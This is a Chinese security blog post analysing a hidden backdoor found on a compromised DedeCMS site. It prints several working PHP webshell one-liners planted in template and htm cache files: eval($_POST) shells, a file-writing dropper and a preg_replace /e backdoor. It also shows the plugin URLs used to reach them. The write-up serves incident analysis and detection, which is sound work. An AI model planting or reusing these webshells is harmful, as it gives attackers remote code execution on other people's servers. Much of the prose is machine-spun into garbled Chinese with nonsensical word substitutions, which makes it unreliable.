|
|
|
联系客服020-83701501

一种奇特的DEDE隐藏后门办法

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
一种独特的DEDE暗藏后门举措

单位某站用的dedecms,即日被某黑阔getshell了,提交到了wooyun.

为了复原黑阔入侵的本事,用鬼哥的getshell测试竟然没失利, 是不是getshell过一次,再次就不会失利呢?

无法只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:

Default
1 {dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}

 

然则翻遍全体的Web目录也没有找到90sec.php文件,有冤家教训说或许是别的文件include这个文件。尔后又用Seay的代码审计东西界说枢纽字各种扫,照样没找到。

结尾老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,翻开这些html文件,代码划分如下:

Default
1234 <!– document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);–>

 

 

 

Default
12345 <!– document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”); –>

 

 

 

Default
123 <!–document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”);–>

 

看到这几个文件很独特,不知道黑阔要干吗??当然代码看似很领会,然则HTML文件能当后门用么?想起之前冤家说的include,尔后聚集前段时 间的getshell漏洞垄断细节,终极翻到plus/mytag_js.php文件,在这个文件里究竟发现黑阔无节操的地方,主要代码如下:

dedecms奇特webshell后门

看到下面的代码我们应该知道黑阔是如许的邪恶,在生成的htm花样的cache文件中写入各种模范的一句话代码,尔后再修改 plus/ad_js.php和mytag_js.php文件,包含htm花样的cache文件。如许黑阔只需要在菜刀中填入如下URL便或许联接一句话 了.

http://www.91ri.org /plus/mytag_js.php?id=1208

http://www.91ri.org /plus/ad_js.php?id=1

具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有干系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为许多默认都差池htm遏制扫描.

不怎么懂php,以是分析或许有差池的地方,欢迎赐正!

link:http://www.nxadmin.com/penetration/1168.html

本文由网络安全攻防研讨室(www.91ri.org)信息安全小组收集整理,转载请阐明因由。

 

数安新闻+更多

证书相关+更多